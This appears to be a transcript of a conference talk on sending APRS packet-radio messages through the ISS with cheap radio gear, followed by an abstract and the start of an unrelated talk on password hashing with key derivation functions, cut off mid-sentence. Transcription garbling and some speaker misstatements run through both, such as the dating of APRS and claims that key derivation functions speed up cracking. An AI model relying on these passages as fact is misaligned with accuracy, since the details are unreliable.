wasn't until I dug into it that I actually realized, oh gosh, they're, you know, they can be different. So you can think of a bod as like a signal interval or like a pulse. And in the early days, I guess, I don't know, I wasn't around during the early days, but early modems would do one bit per bod. So basically just be one bod and one bit were the same. So 1200 bits and 1200 bod were the same exact thing. However, now there's craftiness in there that allows you to transmit at a higher bit rate with the same level of bod rate. So if you can transmit eight bits in a single bod pulse, that should come out to 9600 bits per second, even though your bod rate is only 1200. I don't really know. Again, it's one of these things that that's just what APRS or the packet radio service uses. The software takes care of it all for you. You don't have to worry about it, but it is helpful to know so that the internet doesn't murder you. And then the technique that that is used for like, you know, packing things, you're packing eight bits per single bod is called quadrature amplitude modulation. Say that at a party and no one will want to talk to you. So it's one of those things, again, super nerdy stuff, but it kind of helps to know. For me, you can look at that and at least kind of digest it and understand maybe not why it's that way, but at least that those would are that's what all of these things mean when somebody says, oh, two meter band FM at 1200 bod, you kind of know what's going on there. And then packet radio, you know, I guess to me this wasn't any news, but it's it's packetized data, right? And that's that's one of those things where instead of it just being a continuous flood of data, all the data comes in packets. And especially for, you know, for APRS, it uses the AX 25, which includes your call sign and I believe for FCC requirements, you need to transmit your call sign anytime that you're going to transmit, you know, power out into the, you know, to the atmosphere. And so this basically satisfies that. But yeah, data comes in in packets. And what happens is say you have like a small walkie talkie or not walkie talkie, but a small handheld radio, if you were to transmit on that small radio, what's going to happen there is it is going to get sent out, you know, and not a very far distance. And so the goal of the packet radio service, or I think it's packet radio packet reporting system, I can read my slides, is basically to to repeat that information out farther. So your handheld, you know, radio is going to only make a certain distance, hopefully gets far enough away that, you know, that it can reach a larger repeater that's then going to take your message and repeat it. And the way that APRS works, I think I have this in my next slide, maybe not, but the way that essentially works is you can select how far out you want that message to be repeated. So if you're say, you know, out in the sticks and there's not a whole lot of, you know, there's not a whole lot of repeaters out there, you might want to set a wider setting or, you know, like a time to live if you're familiar with, you know, Internet lingo. That basically says, hey, you know, repeat this out this many hops. And the whole goal of this is essentially to reach what's called an eye gate. And an eye gate will take your packet radio, your take take your transmission and put it on the public internet. So that way, you know, anybody in the world then can now look at it or, you know, any other if you have a program written or something like that, you can digest that information and see where it's coming from, from anywhere in the world. So APRS was created by somebody. His name is Bob Roode. I don't know how to say his last name. Bob created it, I believe in 1973 ish. And if you look at this, this image of the world, every, every continent ish or every, you know, region of the world has a different, slightly different frequency that it transmits APRS on. And those are all in megahertz. So you can see anywhere in the United States, if you're, you know, which is where I am at least, it's going to be transmitted on 144.390 megahertz is the frequency that everything is going to share. The kind of bomber part about that is that because we're all using, you know, and say we ham operator, ham operators, if we're all transmitting 144.390 megahertz, well, your transmission will interrupt somebody else's transmission. So there's a lot of room for collision, especially when you figure that every time you transmit a message, what's going to happen is that's going to be repeated by any number of other larger repeaters. So there's a lot of, you know, potential congestion in there. So it's one of the things that you don't always want to transmit your message as far as it will possibly go. You just want to get it as far as you need to go to kind of be respectful of the space. And again, I'm breaking all this down because you'll see why it's important when it comes to the ISS later on. So automatic packet reporting system, that's what APR stands for. A lot of times what people will do is ham operators will have, you know, a little tracking device, beacon devices that have a GPS unit on there, and they will beacon out, you know, a location at a set interval, you know, it could be 10 minutes, it could be one minute, whatever their specified interval is, and they will beacon from the small transmitter to, you know, larger repeaters with the intent of getting online. And this is useful if, you know, you're somewhere where there's not cell coverage or, you know, this was invented before cell phones ever existed, like, I guess, like as ubiquitous as they are now. And so it was a great way to track things. You know, it's a great way to track, you know, you can put them in your car or put them in a boat, put them in a plane, you know, people have used them for hot air balloons, you know, and just all sorts of things where maybe cell coverage isn't going to fit. This is a great way to track assets really. So you can see from this little image, you know, this is kind of like the traditional what people think of when they hear APRS or, you know, packet radio. They think of a radio that actually transmits the signal. They think of, there's a little device, I think it's called a terminal node controller, yeah, TNC, which basically takes your GPS data and any message data and any other additional data, and it basically makes that into an audio format, you know, it encodes into an audio format that then is transmitted out by your radio. So that's kind of the traditional way that this looks. However, things have changed now since everybody has cell phones. So you can do a couple of things here. So instead of having, you know, a device that has to have onboard GPS and you already have to have an additional piece of GPS information and additional computer and additional encoder and all this different stuff. Instead of what you're going to have here is you can have a Raspberry Pi that does it, or you could just have a phone that, you know, automatically has GPS on board, automatically has the audio cable on board. And basically you hook up an audio cable or a sound card if you're using a Raspberry Pi to a radio, a Chosebaut thing, people love and hate these types of radios, but I like mine personally. And basically what you do is you use then these devices to encode your message, you know, as an audio file that is then transmitted out your radio. And the whole purpose of that is essentially, you know, you could take what used to be a giant apparatus that would fill, you know, like an entire desk and out something that can easily go in your pocket and the batteries last for a pretty decent amount of time. And so that's kind of how this, how like, like the hardware wise, at least what you need or what that looks like. The next part, at least when I was starting out looking at this, I thought that, man, I must need a ton of power in order to transmit to the International Space Station. Like it must just be crazy amounts of power. I'm probably going to dim the lights in my house trying to get the signal that far away. But really, it's incredibly low. I've heard that people have done it on as low as a single watt, but five watts that comes on your standard Baufang radio is more than enough to transmit to International Space Station. And really, when you think about it, that's less power than what your, you know, your phone charger puts out, which I thought was pretty interesting that you could transmit up to something orbiting up in upper atmosphere or, you know, low earth orbit for just five watts just seems kind of crazy that, that there, you know, that I can't get that far, I guess. So this kind of is a better way to, to show what I was trying to explain is that there's a little tracker you can see that I think that I've, I've figured with the name of that tracker is, but basically it's super small tracker. I think it's about $100 that, you know, will, will beacon out, I believe one watt at a pre-described interval with GPS and everything on board. And the whole goal of it is that, that little transmitter may not be able to get very far. But the whole point of it is that you're trying to reach a single DigiPeter and these DigiPeters set up by their ham radio operators. And if there's not one in your area, you know, it's one of those things that would be kind of cool to set one up just to, you know, spread the net of APRS far and wide. But essentially the whole goal is for that little tracking device or, you know, any other, any other end node that you may be having your pocket or whatever to transmit to a higher power DigiPeter, you know, repeater that digitally repeats it. So the express purpose of really trying to get it to a larger gateway, the gateway, you know, in this case is an eye gate and I gate can then connect it to the internet. Nice part about that is once it's connected to the internet, there are websites like APRS.fi which will aggregate all of this data globally. So you can look around and see all the devices that are transmitting out and about in the world. And, you know, you can look at the other side of the world and just see all the devices that are out there. And there's weather stations. You know, hot air balloons, a lot of cars, boats, planes, you name it. There's a lot of devices that are tracked, you know, on APRS and it's kind of neat to be able to see where all these devices are out on the internet. So that was a full big explanation of APRS. And what matters is that the ISS has one of these DigiPeters on board, which at the end of the day is kind of neat because you figure normally you would try and, you know, reach a DigiPeter that is going to be say on a mountaintop nearby. But really, if you can transmit to the International Space Station and have it repeat your signal, so did you repeat your message? Well, now you can be received on a huge, far and wide area down below because the International Space Station has a great vantage point on the rest of the planet. So what's kind of neat is I think I've gotten up to 800 or 1,000 miles from how far I've heard somebody else transmit from. And likewise, normally to, you know, transmit a message that far to, you know, 1,000 miles, you would need a decent amount of power, a great vantage point, and, you know, everything would need to be kind of go right to transmit on, you know, especially VHF or the two meter band that far. Whereas now with the International Space Station, because of its vantage point in space and clear line of sight, you know, down to the earth, you can transmit your message really far, which I, again, I just think is really cool that, you know, the most expensive object that any, you know, that's ever been built that we have the capability is, you know, it's amateurs to be able to transmit relay message off of it. I just think it's kind of neat. Yeah, so this is a website. If you go to ariss.net, you know, it looks like what a website would look like if I made it. You know, the graphics aren't crazy, but at the end of the day, it's really cool in that it aggregates all of the stations that heard the ISS and have transmitted the International Space Station. So again, you don't need any hardware at all. If you have a phone, you can pull up ariss.net and basically just see, oh, what stations around me have heard the International Space Station? Where is the International Space Station? What messages are coming off the International Space Station? Again, because the whole point of it, or maybe not the whole point of APRS, but, you know, at least a, I don't know, a takeaway of APRS is that if that information all gets aggregated online, you know, you can see it from anywhere in the world, which I think, again, is kind of neat. So let's talk about the hardware. I have made the horrific mistake in the past of trying to post links to hardware on, you know, my slides, and then, you know, I find a better price somewhere or I find, oh, it's not there anymore. So what I'm going to try and do this time is if you want to look at the hardware, I'm going to try and keep an up-to-date list at github.com. Again, you can see the link right there. And the whole purpose of that is so that I can update this list and find better prices or whatever, because things change. And, you know, there are better spots, you know, to potentially get some stuff at. So again, this is kind of my, like, go-to hardware, which, again, if you look at it, it's pretty darn cheap. You're looking at $35, $20, $10, $8. You're looking at under $100 to be able to transmit a signal to the, you know, to the AM radio, to the International Space Station, which, again, for that price and the skill requirement and just being amateur and a civilian, I think it's pretty cool. And, you know, this is a cheap Chinese radio. I personally really like them. I know a lot of people on the Internet have hate for them, but it works well for me. And I find that it, you know, for $35, it's a great way to just, you know, not break the bank, but really figure out a ham radio just in general is going to be a good hobby for you. It has a lot of other capabilities. You can listen to normal FM radio, you know, it can be a police scanner. There's just a lot of other stuff that it can do. And so I really like it for $35 on Amazon. You can't really beat it. So let's see. So it comes with what's, you know, a little stick antenna, like what you would see on a walkie-talkie. That's what, if you were to buy this Baufang radio, it would come with, but you can build a directional antenna, which is what you're going to want if you're going to talk to satellites or the International Space Station, because a traditional stick antenna is going to radiate its signal out kind of like a donut. So if you were to hold it like thumbs up, you know, so the radio is, so the antenna is sticking up. So I'm going to radiate out like a donut, and I should probably have a slide in there that has, you know, these radiation patterns. But really what you want is a directional antenna that kind of focuses that being more like a flashlight, you know, into the general spot in the sky where you're trying to focus all of your energy. And so for $10, $20, you can really build your own antenna, which I think is even cooler. And then you need an audio cable, an audio card, if you're going to use the Raspberry Pi, or if you're, if you don't want to use the Raspberry Pi at all, and you just can use your cell phone. You know, typically most people have cell phones. And so just an audio cord for that, you know, under $100, you can no problem transmit the International Space Station. And again, I'm going to try and keep this updated if there's something, you know, missing from it, I'll hope to, you know, shoot me a message and I can, I can update it or see if there's really anything else out there. And again, it's one of those things, you know, for the amount of money, what you get out of it, especially because I'm sure a lot of you have kids that are home from school, or maybe you're a kid that, you know, is learning remotely now. What an awesome project for under $100 to learn about physics, space, orbits, math, you know, all these things that are super nerdy, because I'm super nerd, but, but really there's a lot of other applicable lessons to other stuff out there. The other thing that you're going to want to do is turn on Vox. Again, this is one of those things that I'm probably going to internet hate mail for. Vox is voice operated switch. So basically you can think of it as, as when you start talking, the radio is going to detect that you're, that you're talking already and it will then start transmitting right away. That's nice because that means if you plug an audio cable in from your phone or from a Raspberry Pi, the second that it starts playing audio over that jack, it's going to start transmitting. Why this isn't ideal is because there's always a little bit of space of, you know, a little bit of transmit time after you're done talking where the radio is still on and that can mess up some, some communications. So it's not ideal. You really want push talk, but if you're just getting started, it doesn't hurt just to use Vox just to, just to get your feet wet. That's my personal opinion. Again, I'm going to get hate mail, I'm sure, but whatever. So I own an arrow directional antenna from, it's very similar to the one that's in that image right there. It's like $150, which is more than the entire cost of the project. And if hand radius, but essentially something you're not going to get into, you know, you're going to want to buy some giant antenna. I don't really know. Personally, I have one because it's something that I really enjoy. However, it's $150 and it's pretty steep. Or you could build your own. And this is one of those things that I was just, you know, checking stuff out online. And I saw that somebody had built a, their own directional Yagi antenna for like $10 in like PVC parts and like a measuring tape, which is like perfect because I built everything with raspberry pies in PVC anyway. So I had a lot of that basically just flying around. And a measuring tape, which, funnily enough, I didn't even think about it, but I guess it's, you know, measuring tapes are steel. And so if you, as long as you, you know, basically sand off the tips of your antenna to solder your cables to, it's one of those things that, oh, wow, that's kind of neat. Like you can make an antenna out of a steel measuring tape and it folds up nicely too, which is the added benefit. I'll have a link to this on that GitHub page that I mentioned, but if you just want to Google it right now while you're watching this, if you just do legios, I don't know how you say it. That's how you say it. But that's how I say it. And then Yagi, all the instructions, the build list, everything. I'm not going to go over all the super details or my time lapse of me building mine because not really necessary at all. Just go online, look at it, plenty of other people have done a lot of work to make that pretty nice. So it's one of those things too that like, I personally think this is a nerd merit badge to build your own antenna. That's one of those things. If you're a student, if this is interesting to you, it kind of gives you a little bit more stake in it, not just to like, oh, I bought all this stuff off the internet, put it together, and now I can talk to International Space Station. There's a little bit of that like hacker spirit, hacker mentality just to like, you know, I built this antenna out of raw parts, you know, and kind of cobbled it together to get it to work. And to me personally, I think that's kind of neat just to, you know, kind of have this project of like, yeah, this is something I built my hands and, you know, I'm talking to the most expensive, expensive object, you know, that humanity's ever built, you know, arguably, right. And it's just kind of cool to me that you can talk to International Space Station with PVC and a measuring tape and like a radio that you bought off Amazon. And it takes about an hour to build. If you have kids and you want to all get them interested in space and engineering and STEM stuff, you know, or just to get their hands dirty, I think this is personally a really cool project and it's not going to break the bank to try it. And let's see, I don't know why I can't change sides. So there it goes. So this is my antenna up on top of my patio. It's all on top of my patio, obviously, so I can get a better line of sight. And I keep everything in my little ammo box and I use a tripod. But again, you can just hold your hand out there with an extra piece of PVC and it works just as well. It's one of those things that it looks, it looks homemade and that's what it is, but you're talking to a satellite with a homemade antenna. I think that's pretty cool. So obviously, if you build your own antenna, you're going to have to tune it a little bit. Luckily if you follow the instructions online of the, you know, of the antenna that at least I made when I went to tune it and from what I've heard from others when they go to tune it, everything is pretty spot on it if you measure things carefully. But the way that you tune your antenna is by looking at the standing wave ratio or SWR. And this really just measures the performance. I like to think of it as say you have a, a like a tube of like, you know, gift wrap, right? And you shout down that tube, how much of your sound that's leaving your mouth going through the tube is actually making its way out the tube. And that's kind of how you can think of SWR working with your antenna of, hey, if I'm going to put five watts of power into my antenna, how much of that power is actually going to be coming out my antenna or how much of it's going to be wasted, you know, kind of just banging around the, you know, just kind of radiating off of it. So there's one of those things that, that, you know, if you know a ham radio operator, I'm sure they have, you know, a SWR meter. You can buy a cheap one online for $20. I don't have one of those. I don't know how well it works. I personally have a nano VNA. It was like 50 or something dollars online and does a bunch more stuff other than just looking at SWR, but it's really small. It has a battery. I personally really like it. But again, if you're trying to not break the bank, you know, maybe a $20 one online is worth it or you find a ham radio operator that you just say, Hey, can I plug this in real quick and test it? You know, there are plenty of older ham radio operators that would love nothing more than to talk radio and talk shop. And it's a great way to build the community, build a hobby because ham radio operating is an aging hobby. You know, just go go to any ham radio operator meeting, you know, in your city and your state and your wherever you're from. And it's definitely an older person's hobby, but I don't think it has to be that way at all. The next thing is, it's really just one of those things that if you follow the instructions, you can probably have a pretty good SWR. And again, you I think mine when I did it was 1.3 to one, which I think perfect SWR is one to one. To me, this is just magic. I don't really understand how it works. I just know that you want your numbers to be as close to one to one as possible. Again, if I'm wrong, shoot me a message and let me know and I'll update the slides. So next piece of this is the software. Again, I have lots of Raspberry Pi's lying around from a bunch of other projects. I personally like to use Raspberry Pi. I use the software called DireWolf. It's just an app to get install. Again, if you check out the GitHub page, you'll have the instructions on how to like set it up perfectly. As well as like my configuration files to kind of mess with so you can look at them and not have to recreate it from scratch. And then when you install DireWolf, it'll also install KissUtil, which is what I use to be able to transmit messages into DireWolf. And then the next thing is there's a tool called Zaster. I don't know how you actually say that because it has an X and a Stur in it. So I don't know. I assume that's how you say it. And this is a more of a GUI tool that you can have on the Raspberry Pi, which is kind of neat because you can see, you know, it'll automatically plot where radio transmissions are coming from as they come in through APRS. So if you were to be receiving information and you had Zaster up and running and you're receiving it with DireWolf, you could potentially see all of the beaconing devices or all the other APRS, you know, transmitters that are out and about, which is kind of cool when the ISS goes over and all of a sudden you have to zoom far out to see, wow, look at it, there's all these people, you know, transmitting from all over the world. The last time that I did this, I got a contact from Canada, which, you know, I'm in Central California, right? So it's crossing over at least two states just to get there in a good part of California as well. So I thought that was kind of neat. And those are all applications that you want to look at if this is something you're interested in. There's also a lot of APRS applications for phones. I personally, like I said, I use the Raspberry Pi, so that's not something that I'm, you know, I've checked out a couple of them for iOS, but I haven't played with any of the Android applications. So it's one of those things that I would just recommend checking out an app. You can get trials, I'm sure, of all of these applications and just try to hook up an audio jack to your phone and, you know, just plug it in your bow thing and you're off to the races. And it's one of those things that your phone is kind of the perfect device. It has a battery, it has a GPS, it has a nice touch screen, and it can encode audio like nobody's business. So it's one of those things that before, like I said, you'd have a desk full of equipment and now it's a phone and a radio, and that's all that's really required of, if so, as you have the audio cable in between. Let's see. So the next part of this is planning your pass of like when the ISS is going to be over. This is a screenshot from my app when I was doing the slides. I use this application called GoSatWatch. It's for iOS. It gives you a little bit of augmented reality, which I really like. So what you can see, at least from this screen, is you can see that this is like currently where the International Space Station is and you can see like, you know, what its orbit is. It's kind of cool. It gives you statistics of, you know, how high it, you know, how high it is. So you can see it's like 264 miles, you know, orbiting like that's its altitude elevation. I don't know the technical satellite service for that. It's also going 17,000 miles an hour. And then you can kind of see how far it is relative to where you are. And what's nice is that if you are trying to make, you know, some communication, if you're trying to digipede off of the ISS, what this app allows you to do is if you hit the sky button down below, you can actually hold up your phone. And since it has the compass and everything in there at all, kind of like, orient as to like where you want to point your antenna up in the sky to be able to get your, you know, best transmission or, you know, your best, you know, point of contact. And it gives you live stats. It'll notify you on good passes and then you can, you know, based upon where you are, you can see all the different times of day or night when the, when the ISS is going to come and also does a ton of other satellites. And that's another thing that I probably neglected to mention is that this is just talking to the, or this talk is just going over talking to the ISS, but there are tons of other satellites out there that also perform basically the same operations. All right, let's see, sorry, I had to resume it. But yeah, so this application is great. I think it was like $7 in the app store, but there are plenty of other applications that probably do similar things to just check out. It's worthwhile at least. And the other thing too that, that again, I really like about this is that it'll notify you and you can point this app up and you can see like where in the sky it is. And that matters for a couple of reasons, which I'll go over here in a second. So when you're planning your pass, you also have to take into effect the Doppler effect. I really like the, I'm not sure if anybody's seeing Big Bang for theory. I'm sure plenty of you have Sheldon's costume of the Doppler effect. I just had to throw it in there. But you've all heard the Doppler effect before. It's an ambulance or police cars going by using, you can see the little graphic down below. If it's going away from you, the sound will appear slower because it's a lower, longer wavelength. And as the cars approaching you, it'll be higher pitch because it's a smaller wavelength relative to the object that's traveling. And because the International Space Station is traveling at 17,000 miles an hour relative to where you are on the planet, it's actually having the frequency, you know, its frequency that's on board is Doppler shifting. So when it's coming by you, it's going to be at a higher frequency, you know, so it's going to be 145.825 megahertz plus 3.5 kilohertz. And then as it's leaving, you know, so as it's going away from you, it's going to be a longer wavelength. I hope I did that right, if not again, whatever you understand that depending on where you are situated on the planet and where the International Space Station is either approaching or leaving you, it's going to change slightly the frequency that you're going to tune your radio to. Personally what I do for this is I try and find a pass when the International Space Station is as far overhead as possible or as close to overhead as possible, because then there will be no Doppler shift that I really have to take into account. And again, a single pass is about five minutes, so you don't have a lot of time to really fiddle with your radio and try and readjust or do anything like that. So this is one of those things to take into account, to try and find a pass where the International Space Station is coming as close to overhead as possible. And you can go Google this online, you don't even need an app for it. But I personally found that having the app makes it easier to make more longer distance communications because if the International Space Station is directly above you and you're sending a signal to it, well, it's going to radiate that or it's going to, did you beat that signal right below you? So you're not going to get a contact that's going to be far away necessarily or at least as far as you can possibly get it. The optimal kind of thing if you're looking to try and transmit your signal as far as possible would be to kind of hit the edge of the International Space Station and then have it transmit a farther area away from you. Again, it's one of those things, you know, you can see, I'll go back to the slides, you can see the size of the area that International Space Station covers. So at any given point, you can hit, you know, that's a large portion, you know, of whatever that land mass is, Asia and Europe. And then if that were to fly over the United States, you know, it covers a good portion. And when it flies over California, you can hit Idaho, Colorado, you know, again, depending on whatever its award it is. Okay, so this was the hardest part for me is finding out how to actually send a message. I didn't think it was as difficult as it was. But again, I was using Raspberry Pi and I was trying to do everything on command line. And maybe I was making it more difficult for myself than I really needed to. But again, I could use my phone and have it been easier, but I, but again, with some of the plans that I have going forward, I'd rather do this kind of more in an automated fashion. So I use screen, you can use team ups, you can use multiple putty sessions or, you know, whatever you want to connect to your Raspberry Pi. But essentially I had three separate screens for my Raspberry Pi. I had direwolf that ran my direwolf configuration. So dash C is dash T is to not do any color on the output of when direwolf runs. I have the kiss util, which is installed when you install direwolf. And basically I have the folder RX and the folder TX that, you know, if anything I receive will go into the RX folder, anything that I transmit will go into the TX folder. And so that's kind of nice because I can just drop text files in there. And then the kiss util and direwolf will take care of converting that to audio and then transmitting it out, which is, which is awesome. Because then at that point you can script up whatever you want. You can do things on in an automated manner or manually. But again, you only have five minutes or so that you're trying to, you know, communicate with international space station and then even more of an arrow window when it's directly above your one, it's kind of prime time. And you don't want to necessarily, you know, you want to have everything set up in such a way to where you can send out a single message per pass, you know, or maybe just a handful of messages per pass because there are other people also trying to communicate with it. And if, and if you remember the international space station is operating on a single frequency. You know, it's operating on 145.825 megahertz, which again, I don't know if I put that in notes, but again, it'll be, you Google it, right? Like it's out there. But, but only one person can talk to international space station at a time. So you don't want to be constantly transmitting because then you'll prevent other people from also communicating with it. So basically what I had is on a, I believe every minute interval, I would have it, you know, copy my message.txt into the transmit folder and they would shoot that message off or, you know, transmit that message off, I guess I should say. And so what's kind of neat about this is that you can script it up in such a way that, you know, if you have a program that you want to have automatically be consenting out, you can or anything like that. Personally, I like that. But if this is just, you're just trying to make a contact or, you know, you're trying to, you know, if you want to be digitized off the international space station, that's your only goal. You know, just with your phone, you can just send the message out that way manually. You don't have to go through all this dire wolf craziness. Most phone applications should be able to do it pretty darn easily. All right. So this is a sample message. And I'm going to decipher it here real quick. So if you see the KJ60HH, that's my call sign, followed by APRS. And then ARISS, that indicates basically that I want to be digital by the international space station. Then you'll see my call sign again, followed by a dash seven. That's because this is coming from my mobile unit, which is just my Balfang radio. After that, you'll see my GPS coordinates. They're kind of in a funny format, not a format that I'm used to seeing, but it's not hard to kind of decipher what those mean. And then followed by a dash. And then after that dash is just whatever message you'd like to send to the international space station. So it's not super difficult to decipher, but if it's your first time looking at APRS messages, it might be a little bit more difficult than you would have anticipated. This is the folder structure. So when I run direwolf, I run it from my home directory, direwolf config is right there. And then I have a TX and an RX folder for the messages that I'm going to send, go into the TX folder and messages that I'm going to receive come from, or, you know, get placed in the RX folder. Let's see if I can get this. All right. So some of the things going forward, I think that are important to cover. You know, so my goal with this is I want to automate it. I want to make some rotors and rotors, if you're not familiar, are basically what it would allow, you know, rotors would allow me to change the elevation, you know, up and down. So like if you're looking like a tripod, a great example, right? I could, you know, change the orientation 360 degrees like a compass and then the elevation up and down. Because it would be really cool if on the Raspberry Pi you had some software that basically tracked for the International Space Station was and anytime it was up, overhead to transmit a message automatically. So that's kind of my idea of what I think would be kind of neat. So we'll see how that goes. And then I would also like to see, you know, how far away can I hear from, you know, or how far could I be digitized by the International Space Station. And if you kind of think about it, you know, out onto the horizon. So if you were, if you were out, you know, basically to the horizon, that would be zero degrees. But obviously there are trees, there are houses, there are all those things in the way. And so there's a point at which, you know, you can hit the International Space Station, you know, with a signal maybe is that 20 degrees, is it 30 degrees, is it 40 degrees, the higher the elevation is relative to where you are on the ground, the easier it will be to communicate with it. So it's one of those things that automating it, I think would be kind of neat. And I also like to, you know, investigate looking at other satellites. Yeah, and basically just just seeing what else is out there. A huge thank you to AMSAT and IRISS.net just because checking out that website inspired me to, you know, try and get on the board. It's anything with AMSAT. There's tons of great information there on how other people have, you know, had successful communications. And really at the end of the day, I think this is just something that's kind of cool. You know, the hacker mindset here of just kind of scraping and cobbling together all these things to really do something that's kind of neat to be able to transmit to the International Space Station. Not to mention too that this is how you can transmit to a lot of other satellites. And it's really kind of covers the basics in terms of what's required to talk to a satellite, right? There's a whole bunch of different satellite orbits, a whole bunch of different satellite communication protocols, frequencies, modulations, and this is just dipping your toe in the water of what's available and what's out there. And it's for honestly a pretty small budget, right? For $100, $200, you could get a really solid setup to, you know, to communicate with the International Space Station of the satellites with just a ham license, you know, just being an amateur radio operator. And if you just want to hear, if you just want to listen to what gets transmitted, you know, you can do that without a license and really you can just get a Baufang radio, your phone and, you know, it doesn't even have to be a directional antenna at that point. You know, if you just want to listen, you can have an omnidirectional antenna, which is basically just, you know, a longer version of the normal stick antenna that would come with the Baufang. Again, I'll post links to everything on that GitHub page. But yeah, at the end of the day, this is a great way just to get started if it's something that you're interested in. And then from there, who knows how much farther you can level up and, you know, what other satellite communications you can do. You can spend thousands and thousands of dollars and, you know, sink a full-time work week into all of this stuff, especially as an amateur. So it definitely helps to have a good starting point and to have a good point in time of, like, this is something that I can measurably check off a list and do. And especially, again, I know that I've said it a bunch of times, but if you have kids at home, if, you know, if you're a kid at home, this is a great project to really get your feet wet and you learn a ton of different principles from physics to, you know, radio, to computers, to, you know, protocols. So just, there's so many small lessons intertwined that I just think it's kind of one of those perfect projects to, you know, to basically figure out if it's for you, ham radio-operating is for you to find out if chasing satellites across the skies for you. So again, I encourage you to take a look at it. Feel free to check out the GitHub page. I'll post some of my contact information on there along with the links to all the hardware and all the apps and all the things that I've mentioned. And yeah, hope you enjoy the talk. See how I pause this thing. All right. Thank you for that great talk. We have Eric here who takes him Q&A. I think one of the ones that came up in the Twitch chat first was the person actually hit by that police car. They were a little worried about that. Can you hear me, Eric? I don't know if Eric can hear us here. We can't hear you. Are you talking, Eric? Hello, Eric. Yeah, I can hear you fine. I don't think, uh, I think our speaker is having some technical difficulties. So what we'll do is he'll just hang around and chat in the village on the channels there. And if you have any questions, he'll follow up certainly in text and maybe on one of the voice channels in there. Alrighty. Thanks everybody for attending and hope you all enjoy the talk. I thought it was pretty, pretty awesome. And I'll go from here.
|
Reaching out into space may seem like it would require a PhD and thousands of dollars of equipment, but it can actually be done for about $100. In this talk I will detail how to get started talking to satellites using basic equipment. With just a Ham Radio license and some gear, you too can talk to satellites and by extension people thousands of miles away.
|
10.5446/51625 (DOI)
|
Good afternoon, good evening, or even good morning, depending on which part of the world you are listening this talk from. And no, it does not get old. I still want to give a huge shout out to the crypto village organizing community for making this virtual con happen for us. Welcome to the second talk of the day from my side. In this talk, I'm going to touch base upon how to store for sensitive information securely so that we can safeguard it reasonably well against any kinds of offline cracking attempts. And before we go ahead, I'd like to introduce myself. I'm Anshit Sheth. I work as a security researcher at a leading static analysis company called Veracord. My primary responsibility here is to be on top of the latest and greatest happenings in the security field, more specifically in the application security domain, and transfer that knowledge to make sure our customers are safe. I'm a huge crypto enthusiast. I have spent a lot of time or actually the reasonable amount of time understanding different base crypto blocks, its practical implementations, how it can be used in real world. I understand a lot of anti patterns. I've spent a lot of time looking at different crypto implementations across programming languages. And I tried to translate all this expertise into making sure our customers for business are safe and to help pick up any anti patterns. Recently, I got thinking, why are we seeing so many data breaches in the first place? Eventually, I realized, okay, this is going to be a matter of when rather than if. So what can we do to protect this information once it is already breached mainly from any kind of offline cracking? How can we make the information cracking process very, very expensive that it is almost useless? So in that quest, first place, I'll definitely go for that matter of which first thing comes to anyone's mind would be our TriHunt's most organized, most informative site about this called Havibene Pond. In this site, he keeps a database of all the breaches which has happened in probably last decade and gives out information about what might have happened, what has happened, and all those kind of neat stuff. So instead of putting a big slide of shame kind of thing like who got hacked and what were the reasons and stuff, what I tried to do was look at all the domains which were hacked and what kind of mechanism were they using for storing any kind of sensitive information. So this is what my analysis says. There were around 453 unique domains, 13% were storing it in plain text, 20% as a hashes without any salting, 30% as salter hash. Around 15% still using a key derivative functions which is a great step and roughly 23% decided not to disclose which in my opinion is plain text but no judgments here. So like looking at it, I was thinking, okay, why were they breached in the first place? Most of the times it was because they did not pay a lot of attention in other kinds of security issues in their applications. A lot of them were simple SQL injections where entire databases were dumped out. Open SV buckets was not an uncommon thing I saw. There were a lot of unprotected endpoints which kind of leaked this data. So that was my first lesson learned that why are these things happening? And now then mainly my focus was towards thinking about okay, this breach has already happened or these breaches are always going to keep happening for even for innocent reasons sometimes. Well, there is nothing innocent about security. So my next thing was okay, now what can what happens after these breaches are done? And my first thought was like, oh wow, the modern computer architecture is getting cheaper and cheaper and it's going to keep getting cheaper from now on. All this modern GPUs with extremely high parallelization capabilities can craft these things in minutes and making the cost much more, making the password cost much cheaper for any kind of offline mechanisms. There are with the whole Bitcoin mining philosophy of cracking, there are so many ASICs application specific integrated circuits out there which makes the cost of cracking much more cheaper. There are literally trillions of hashes happening within seconds and this can be easily mapped to any kind of crypto permiters. All these things are going to keep making password cracking much more cheaper with time. So what should we do? Well, the need of the hour was always stretching this information out so that it takes, we have to throw a lot of computational resources like CPU and memory to compute each password. With that, we are going to increase the speed with which the passwords are being calculated. This will greatly increase the offline cracking time and making us silent towards any kind of modern computer architectures or boot forcing or any kind of time memory tradeoff attacks or rainbow tables, dictionary attacks, all those kind of things. So that's what we really needed and how did we achieve that is using key derivation functions. Well, this concept of key derivation function isn't specific to password hashing or secret information hashing. In fact, it came into existence for actually creating key material out of low entropy inputs. But at that time, when everyone was in this cat and mouse race, people thought that KDFs are much better suited than just simply storing things as plain hashed or salted hashes. It can be much better safeguarded at that time. And thus, this whole philosophy of using key derivation functions KDFs came into picture. So simply how this works. Well, underlying there is still algorithm which is used, which is iterated hundreds and thousands and sometimes a couple of millions of times on a basic crypto primitive. This type of functions are called adaptive functions. And then much more matured ones are throwing a little or sometimes a lot of memory to this iterative process, which increases or almost quadruples the speed of cracking offline. And still it takes password and salt gives out a fixed length hash. And it's the work factor which is which can be tuned based on different hardware your application is being deployed. So that's going to be the base of our talk today to protect our safeguard against most of the offline cracking mechanisms. Some design considerations I'd like to point out here is try to save your password hash and salt in completely different databases like or a distributed database or like maybe a database and a property file or something. They should not be close to each other. Obviously, you're not going to store password in plain text anymore. I can even go as far as saying that maybe we can have different works or work factors for different information we are trying to safeguard or even like different logins can have different work factors and storing work factor for logging, obviously. With increasing cost in memory or CPU, it should be routinely checked that work factors are incremented accordingly to keep making password offline cracking expensive. Lastly, how expensive should be is tolerable or acceptable. Industry standards are any kind of interactive login, a latency of around one second is very acceptable. Make sure you tune your work factors in a way that the output is calculated around a second. This is acceptable latency and it still increases the offline cracking time by a huge margin. Lastly, if you are using your password or trying to save a password which is not going to be involved in interactive logins like for example, your hard disk encryption, a latency of around 5 to 6 seconds is quite acceptable in that scenario. Those are the things I would like to say about key derivation functions in general. Let's start talking about different key derivation functions in existence starting with adaptive functions. One of the oldest and the most widely adopted function was PBKDF2, again it came into picture because they really needed to generate key materials. This function is the only government approved function right now so if you really have to comply by government standards, I really wish you don't, then this is probably your only option unfortunately. This function is also used as different crypto primitive blocks for other modern functions in these days. Let's see how this actually works internally. Just like our generic KDF working, it still takes a password assault, gives out a password hash, you can actually configure the size you expect out of a password hash. This feature was more for because there is always requirement of a fixed key size for any kind of block cipher being used 